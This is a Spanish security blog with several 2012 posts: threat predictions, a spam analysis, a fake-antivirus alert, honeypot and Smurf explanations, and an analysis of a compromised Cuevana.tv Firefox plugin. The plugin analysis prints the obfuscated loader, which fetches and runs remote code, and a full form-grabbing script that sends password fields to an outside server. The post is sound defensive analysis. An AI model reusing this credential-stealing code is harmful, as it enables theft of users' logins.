Se cierra la puerta de 2012 y es hora de mirar hacia el año que viene. A medida que realiza sus planes de negocio y de TI para 2013, los criminales cibernéticos están decidiendo implementar amenazas cada vez más sofisticadas dirigidas a sistemas informáticos específicos y a organizaciones chiquitas y grandes.
En el último año las compañías han visto varios hackeos y fugas. A medida que la carrera entre los atacantes y las firmas continúa evolucionando en 2013 los departamentos de TI y los profesionales de seguridad tendrán que estar pendientes de las tácticas cambiantes y de los enfoques usados por los hackers criminales con el fin de proteger a sus organizaciones.
Esta es nuestra visión de cuales amenazas y tendencias de seguridad esperamos ver el próximo año:
Amenaza #1: Ingeniería Social
Esto comienza con el enfoque en una táctica blackhat comprobada en los mundos físicos y digitales – la ingeniería social. Antes de la era informática esto significaba infiltrarse por las defensas de una empresa con el don de la palabra en lugar de correos electrónicos ingeniosos. Ahora la ingeniería social ha pasado a las redes sociales incluyendo Facebook y LinkedIn.
Los atacantes están aumentando su uso de la ingeniería social que va más allá de llamar a los empleados blanco e intentar engañarlos para que brinden información. En los últimos años tal vez llamen a la recepcionista y le pidan que los transfiera a un empleado blanco para que la llamada parezca provenir de adentro de la compañía si utilizan identificador de llamadas. Sin embargo, tales tácticas no son necesarias si los detalles que busca el criminal cibernético ya están publicados en redes sociales. Después de todo las redes sociales se tratan de conectar a la gente y un perfil convincente de una empresa o de un individuo seguido de una solicitud de amistad o de conexión puede ser suficiente para ejecutar una estafa por ingeniería social.
Amenaza #2: APT
Por supuesto es importante estar consciente de la ingeniería social porque puede ser el precursor para un ataque sofisticado con el propósito de superar la muralla de su organización. Este año tuvo una cantidad de ataques de alto perfil (Gauss y Flame) dirigidos a corporaciones y a gobiernos. Estos ataques son conocidos como Amenazas Avanzadas Persistentes (APT por sus siglas en inglés). Son muy sofisticados y construidos cuidadosamente. La intención detrás de los ataques APT es ganar acceso a una red y robar los datos silenciosamente. Toman un enfoque bajo y lento que a menudo los hace difíciles de detectar dándoles una gran posibilidad de éxito.
Además los APT no siempre necesitan dirigirse a programas bien conocidos como Microsoft Word, también pueden dirigirse a otros vectores tales como los sistemas incorporados. En un mundo donde una cantidad creciente de dispositivos tienen direcciones de protocolo Internet, nunca ha sido más relevante construir la seguridad dentro de estos sistemas.
Las APT continuarán a medida que los gobiernos y otras organizaciones bien fundadas buscan el ciberespacio para realizar su espionaje. De hecho, los ataques APT corren en este momento así que busque esas anomalías en su tráfico de red.
Amenaza #3: Amenazas Internas
Pero algunos de los ataques más peligrosos vienen de adentro. Estos ataques pueden ser los más devastadores debido a la cantidad de daño que puede causar un usuario privilegiado y a los datos que pueden acceder. En un estudio financiado por el departamento de seguridad de Estados Unidos, el CERT el centro de amenazas internas de la facultad de ingeniería de software de la Universidad Carnegie Mellon y por el servicio secreto de los Estados Unidos los investigadores encontraron que los infiltrados maliciosos dentro de la industria financiera generalmente logran su fraude por casi 32 meses antes de ser detectados. Como dicen, la confianza, es una materia prima preciosa – pero demasiada confianza puede dejarlo vulnerable.
Amenaza #4: BYOD
El asunto de la confianza viene a colación también en el mundo móvil con muchas empresas que luchan por generar la combinación correcta de tecnologías y de políticas para unirse a la tendencia de traiga su propio dispositivo (BYOD). Los usuarios cada vez más utilizan sus dispositivos como usarían sus computadores y al hacerlo están abriéndose a ataques basados en la web igual como si estuviesen operando una computadora de escritorio.
Para los atacantes es probable que haya más intentos de rodear los mecanismos de detección y revisión de aplicaciones que los proveedores móviles utilizan para vigilar sus mercados de apps. Todo esto significa que la avalancha de iPhones, teléfonos Android y otros dispositivos que llegan al lugar de trabajo estan abriendo otra puerta potencial para los atacantes que se debe proteger. Piénselo – su teléfono inteligente tiene una cámara. Tiene un micrófono. Puede grabar conversaciones. Agregue estas características a la capacidad de acceder su red corporativa y tendrá la escalera ideal para subir por las paredes de las que hablamos.
Amenaza #5: Seguridad en la Nube
BYOD no es lo único que está cambiando las paredes de las corporaciones deben construir alrededor de datos críticos. También existe esta pequeña tendencia llamada informática en la nube. Con más empresas poniendo más información en los servicios de nube pública, esos servicios se vuelven blancos jugosos, y pueden representar un solo punto de falla para la compañía. Esto significa para las empresas que la seguridad debe continuar siendo una parte importante de la conversación que tienen con los proveedores en la nube y se deben dejar claras las necesidades del negocio.
Amenaza #6: HTML5
Así como la adopción de la informática en la nube ha cambiado la superficie de las vulnerabilidades así lo hará HTML5. A principios de este año se destacó en la conferencia Black Hat el lugar donde los profesionales de seguridad pueden enterarse de los ataques por venir, ese soporte e integración de soporte multiplataforma HTML5 de varias tecnologías abre posibilidades nuevas de ataques como abusar la funcionalidad Web Worker. Incluso con una cantidad en aumento de atención a la seguridad HTML5 su novedad significa que los desarrolladores cometerán errores a medida que lo usan y los atacantes tratarán de aprovecharse. Así que espere ver un aumento en ataques orientados a HTML5 el próximo año ojalá con un declive gradual a medida que mejora la seguridad con el tiempo.
Amenaza #7: Botnets
Pero aunque la carrera de armas entre investigadores y atacantes favorece la innovación espere que los criminales cibernéticos gasten mucho tiempo perfeccionando lo que saben mejor como garantizar que sus botnets tengan alta disponibilidad y se distribuyan. Mientras que los desmantelamientos legales lanzados por compañías como Microsoft tuvieron éxito al interrumpir temporalmente las operaciones de spam y de malware es ingenuo asumir que los atacantes no han aprendido nada de esos desmantelamientos y que no los utilizan para reforzar sus operaciones. Las botnets llegaron para quedarse.
Amenaza #8: Malware de Precisión
Los atacantes también están aprendiendo de los pasos que los investigadores toman para analizar su malware y existen técnicas demostradas recientemente que pueden ayudar a hacer el análisis inefectivo al diseñar malware que fallará en su ejecutarse correctamente en cualquier entorno aparte del blanco. Los ejemplos de estos ataques incluyen Flashback y Gauss. Ambos han sido exitosos especialmente al detener a los investigadores en el análisis de malware automático. El próximo año los atacantes seguirán mejorando e implementando estas técnicas y hacer su malware más dedicado para que sólo ataque computadores con una configuración específica.
Una cosa es cierta, 2013 seguro traerá un ejército de explotaciones y de malware mediante vectores que van desde las redes sociales a los dispositivos móviles a los mismos empleados. A medida que sigue mejorando la seguridad en los sistemas operativos así mejorarán las técnicas nuevas de los cibercriminales para superar estas defensas. Razón de más para cumplir la resolución de la seguridad.
jueves, 27 de diciembre de 2012
Felicidades ganaste 250,000 Euros
vamos a analizar este tipo de mensajes.
la dirección f.graff-immomartin@wanadoo.fr envía como SPAM un numero alto de MSJ a una lista de correos
electrónica que seguramente compro en algún mercado negro de Email´s y llega alas direcciones de las "victimas"
en el cual se adjunta un documento .PDF (el cual esta infectado con un código malicioso, un intento fallido de gusano de troya)
el documento describe a ver sido sorteado mágicamente y coincidió tu nombre, fecha de nacimiento e email.
Todo esta información esta llena de datos falsos (Spoofer Information) la cual la intención bastante pobre y decadente es tratar de ganan un poco de información sobre los inocentes que caigan en este débil truco de ganar accesos.
En primer lugar.
Siendo Microsoft la compañía si no la mas importante a nivel red por sus desarrollos y $$$ en las TI tendrían una redacción e imagen corporativa en sus documentos con tan poco carácter profesional, obviamente no.
yo me considero una persona con muchas falsas de ortográfica y con un conocimiento limitado en cuanto a temas de redacción y documentación corporativa, el documento falso que se adjunta en el correo Poofeado es totalmente obvio de su carencia de profesionalidad y de formalidad.
Segundo lugar
cualquier tipo de información proveniente de Microsoft obviamente sale con correos de su dominio @Microsoft.com
por ello en resumen antes de renunciar a sus empleos tras leer este tipo de nasura cibernetica antes que nada pregunten quien regala dinero asi nada mas en esta vida.
saludos!
domingo, 4 de noviembre de 2012
TROJ_FAKEAV.EHM, el Virus del nuevo Windows 8
Windows 8 fue lanzado al mercado por Microsoft el pasado viernes y a día de hoy, ya existe un virus que compromete su seguridad. En un momento como el actual, en el que el citado sistema operativo empieza a venderse a muchísimos usuarios, se antoja ideal el contexto para una rápida proliferación del malware.
El malware en cuestión, se hace pasar por antivirus y realiza un escaneo para intimidar a los usuarios al notificar posibles amenazas, provocando que el usuario decida instalarlo para solventarlos. La característica llamativa es que el malware se presenta y está empaquetado como un programa para Windows 8.
Por cortesía de Trend Micro, se ha comprobado que el malware se detecta comoTROJ_FAKEAV.EHM. Es un problema para el usuario porque es reciente y se presenta como un programa para Windows 8, algo complicado de anticipar por la temprana salida del sistema operativo a la venta.
En este punto, cabe recordar las recomendaciones del FBI sobre smartphones y los virus a los que están expuestos. Es importante que esta vulnerabilidad sea de dominio público lo más rápido posible para evitar que los ciberdelicuentes aprovechen de nuevo un reciente lanzamiento, como ya ocurriera conInstagram y Bad Piggies
_____
Fuente;http://www.nacionred.com
¿Que es un Honeypot?
Se denomina honeypot al software o conjunto de computadores cuya intención es atraer a atacantes, simulando ser sistemas vulnerables o débiles a los ataques. Es una herramienta de seguridad informática utilizada para recoger información sobre los atacantes y sus técnicas. Loshoneypots pueden distraer a los atacantes de las máquinas más importantes del sistema, y advertir rápidamente al administrador del sistema de un ataque, además de permitir un examen en profundidad del atacante, durante y después del ataque al honeypot.
Algunos honeypots son programas que se limitan a simular sistemas operativos no existentes en la realidad y se les conoce como honeypots de baja interacción y son usados fundamentalmente como medida de seguridad. Otros sin embargo trabajan sobre sistemas operativos reales y son capaces de reunir mucha más información; sus fines suelen ser de investigación y se los conoce como honeypots de alta interacción.
Un tipo especial de honeypot de baja interacción son los sticky honeypots (honeypots pegajosos) cuya misión fundamental es la de reducir la velocidad de los ataques automatizados y los rastreos.
En el grupo de los honeypot de alta interacción nos encontramos también con los honeynet.
¿Que son los ataques Smurf?
El ataque smurf es un ataque de denegación de servicio que utiliza mensajes de ping al broadcast con spoofing para inundar (flood) un objetivo (sistema atacado).
En este tipo de ataque, el perpetrador envía grandes cantidades de trafico ICMP (ping) a la dirección de broadcast, todos ellos teniendo la dirección de origen cambiada (spoofing) a la dirección de la víctima. Si el dispositivo de ruteo envía el trafico a esas direcciones de broadcast lo hace en capa 2 donde está la función de broadcast, y la mayoría de los host tomarían los mensajes ICMP de echo request y lo responderán multiplicando el tráfico por cada host de la subred. En las redes que ofrecen múltiples accessos a broadcast, potencialmente miles de máquinas responderán a cada paquete. Todas esas respuestas vuelven a la IP de origen (la IP de la víctima atacada).
Algunos años atras, todas las redes enrutaban ataques smurf en la jerga se dice que eran "smurfeables" Hoy día, la mayoría de los administradores han inmunizado sus redes contra estos abusos, aunque muchas redes permanecen smurfeables.
Para asegurar una red que disponga de enrutadores Cisco es tan simple como correr el comando no ip directed-broadcast.
jueves, 1 de noviembre de 2012
Como instalar Google Chrome en BackTrack como usuario ROOT
Primero que nada descarga el navegador de google
ya en el escritorio abrimos una terminal
los comandos que usaremos para realizar la instalacion;
dpkg -i google-chrome-stable_current_amd64.2.deb
con esto ya tendremos el navegador instalado, esto como usuario root.
ahora vamos a menu de BT, internet y damos clic derecho sobre el icono de google chrome, seleccionamos "dar acceso directo en la barra de tareas
ahora realizamos la configuracion requerida para que el navegador corra con el usuario root para ello colocaremos en command la siguiente linea, --user-data-dir
por ejemplo yo descarge el navegador en 64 bits por lo que en mi caso quedo de esta manera;
/opt/google/chrome/google-chrome %U --user-data-dir
con esto ya podremos usar el navegador como usuario root.
domingo, 23 de septiembre de 2012
Cuevana.tv y su plugin espia
Cuevana.tv es un reconocido sitio de películas que permite hacer streaming gratuito de los últimos estrenos de Hollywood con mucha comodidad, para lograr esta “comodidad” para el usuario, es necesario instalar un plugin en nuestro navegador, que permitía tomar las películas que cuevana.tv almacenaba en servidores de descarga gratuita como fuente para realizar streaming desde ellos.
Gracias a @Ursack me entero que precisamente este plugin se ha vuelto noticia, luego de que el usuario RME de Foro Coches iniciara un hilo donde ponía en evidencia un código malicioso que se encontraba dentro del plugin de cuevana y que enviaba información del usuario al dominio CUEVANATV.ASIA
(Click para Agrandar)
Lo primero que hice fué revisar mi propio plugin ya que a veces utilizo el servicio de cuevana, pero como lo había instalado hace mas de un mes no tenia el código malicioso del que todos hablan, me metí a la pagina oficial a descargar el plugin y descargué una copia para compararla con la mía. Le cambio el nombre a los plugins para identificarlos fácilmente y procedo a descomprimirlos, recuerden que los plugins de Firefox son básicamente archivos comprimidos con extensión xpi.
(Click para Agrandar)
Básicamente los 2 plugins son iguales, lo único que cambia entre versión y versión es una línea en el archivo content/script-compiler.js que solo aparece en la versión infectada.
(Click para Agrandar)
La línea en cuestión esta empaquetada para que no pueda ser leída tan fácilmente, por lo que de entrada genera sospechas:
1
| eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d1=k1||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k1){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k1)}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{})) |
Por tanto lo primero que haremos será utilizar nuestro desempaquetador preferido para ver mas claramente que es lo que hace el código:
1
2
3
4
| ar r = new XMLHttpRequest();r.open(‘GET’, ‘http://cuevanatv.asia/back3.js?’ + Math.random(), false);r.send(null);eval(r.responseText); |
Como pueden ver se hace un llamado a un código JavaScript, al que desgraciadamente no pude acceder por que en el momento que escribo este articulo el dominio cuevanantv.asia,(curiosamente registrado a nombre de María Helena Chávez, la esposa de un político Argentino… que puede dar pistas sobre la procedencia del atacante…) se encontraba fuera de servicio.
Afortunadamente los chicos de forocoches alcanzaron a tener acceso a este script, entre otros scripts almacenados en cuevanantv.asia y esto fué lo que encontraron:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
| var r = new XMLHttpRequest();r.send(null);if (r.status == 200) eval(r.responseText);OSid = Components.classes['@mozilla.org/xre/app-info;1'].getService(Components.interfaces.nsIXULRuntime).OS;OSid = (OSid == 'Darwin') ? 3 : ((OSid == 'WINNT') ? 2 : ((OSid == 'Linux') ? 1 : 0));function _sData(datos, url) { var r = new XMLHttpRequest; r.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); r.send("d=" + datos + "&o=" + OSid + "&u=" + url);}Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService).addObserver({ observe: function (aWindow, aTopic, aData) { if (aWindow instanceof Ci.nsIDOMWindow && aTopic == 'content-document-global-created') { var win = aWindow.wrappedJSObject; win.addEventListener("submit", function (e) { datos = []; enviar = false; for each(i in e.target.elements) { if (i.type == 'password') enviar = true; if (i.type != 'hidden' && i.type != 'submit' && i.type != undefined) datos.push(i.name + "::" + i.value); } if (enviar) _sData(datos.join(":_:"), win.location.href); }, false); var xmlhr = new Object(); xmlhr.open = win.XMLHttpRequest.prototype.open; xmlhr.send = win.XMLHttpRequest.prototype.send; if (win.location.host.indexOf("facebook.com") == -1) { win.XMLHttpRequest.prototype.open = function (a, b) { a = (!a) ? '' : a; b = (!b) ? '' : b; xmlhr.open.apply(this, arguments); xmlhr.metodo = a.toLowerCase(); xmlhr.url = b; if (xmlhr.metodo == 'get') xmlhr.datos = b.split("?")[1]; } win.XMLHttpRequest.prototype.send = function (a, b) { a = (!a) ? '' : a; b = (!b) ? '' : b; xmlhr.send.apply(this, arguments); if (xmlhr.metodo == 'post') xmlhr.datos = a; xmlhr.callback(); } } xmlhr.callback = function () { enviar = false; activadores = ["pass", "pss", "clave", "contra"]; for each(dato in this.datos.split("&")) { for each(activador in activadores) { if (dato.split("=")[0].indexOf(activador) > -1) enviar = true; } } if (enviar) _sData(this.datos.split("&").join(":_:").split("=").join("::"), win.location.href); } win.addEventListener("DOMContentLoaded", function (e) { for (site in scripts) { if (win.location.host.indexOf(site) > -1) { var r = new XMLHttpRequest(); r.open('GET', scripts[site], false); r.send(null); if (r.status == 200) eval(r.responseText); } } }, false); } }}, 'content-document-global-created', false); |
En resumidas cuentas lo que hace ese script es enviar los datos de los formularios que llenemos y cumplan con unos parámetros específicos a un servidor donde serán almacenados para su posterior uso por una persona mal intencionada, en el siguiente video podemos ver el funcionamiento del plugin infectados y como enviaba los datos atravez de nuestro navegador.
Con lo que se confirma que efectivamente el plugin de Cuevana.tv para hacer streaming de películas gratis, tenia un código malicioso que robaba información sensible, además de código especifico para hacer pishing a varias entidades bancarias.
El administrador de Cuevana.tv aunque tuvo conductas sospechosas, como eliminar el código malicioso del plugin sin notificar a nadie, ni aumentar la versión del mismo, aseguró desde la cuenta oficial de cuevana.tv en twitter (tan pronto la noticia se dio a conocer por menéame) que nunca harían eso a sus usuarios…
Al parecer cuevana.tv fué vulnerado (de nuevo,,,), y lograron inyectar ese código en el plugin del sitio, ellos afirman que investigarán el caso y mas les vale, por que todos sus usuarios estaremos ansiosos de ver los resultados de esta investigación, para descartar una mala intención directamente de los creadores de cuevana.tv
Conclusiones y Recomendaciones sobre el plugin espía de cuevana.tv
- La conclusión mas importante que te debes llevar es que no instales plugins en tu navegador de dudosa procedencia, siempre busca comentarios de otras personas sobre el plugin y descargalo siempre que sea posible, de la pagina de complementos oficial de tu navegador.
- Cambia TODAS las contraseñas de tus servicios web, es muy posible que una persona mal intencionada ya cuente con ellas y al verse descubierto/a intentara sacar el máximo jugo a su botín en el menor tiempo posible.
- Utiliza contraseñas diferentes para todos tus servicios, ya vimos como cuevana.tv fue vulnerado y si lograron modificar archivos en el servidor, podrían acceder a toda la base de datos de usuarios, ¿tienes la misma clave que usas en cuevana para otro servicio?… ¿ya entiendes por que es importante usar una clave para cada cosa?
------
Fuente:
Suscribirse a:
Entradas (Atom)